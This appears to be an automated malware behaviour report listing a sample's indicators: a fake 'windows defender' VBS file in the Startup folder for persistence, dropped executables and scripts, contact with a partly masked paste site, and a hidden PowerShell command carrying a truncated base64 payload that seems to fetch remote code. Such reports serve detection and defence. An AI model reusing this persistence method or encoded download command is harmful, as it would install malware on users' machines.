Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- %APPDATA%\microsoft\windows\start menu\programs\startup\windows defender om22.vbs
Malicious functions
Downloads
- $asxzdbjdfdfdf.replace(}}}} as /
Modifies file system
Creates the following files
- %HOMEPATH%\music\tt.exe
- %HOMEPATH%\music\vvv.vbs
- %HOMEPATH%\music\vvvv.vbs
- %TEMP%\is-8iuus.tmp\tt.tmp
Network activity
TCP
- 'pa###bin.com':443
UDP
- DNS ASK pa###bin.com
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\wscript.exe' "%HOMEPATH%\Music\vvvv.vbs"
- '%HOMEPATH%\music\tt.exe'
- '%TEMP%\is-8iuus.tmp\tt.tmp' /SL5="$7001C,16125842,188928,%HOMEPATH%\Music\tt.exe"
- '%WINDIR%\syswow64\wscript.exe' "%HOMEPATH%\Music\vvv.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -enc JABBAFMAWABaAGQAYgBqAGQAZgBkAGYAZABmACAAPQAgAEAAJwANAAoAaABeAF4AXgBeAHAAcwA6AH0AfQB9AH0AfQB9AH0AfQBwAGEAcwBeAF4AZQBiAGkAbgAuAGMAbwBtAH0AfQB9AH0AcgBhAHcAfQB9AH0AfQB5ADkAZABjADIAVwAy...' (with hidden window)
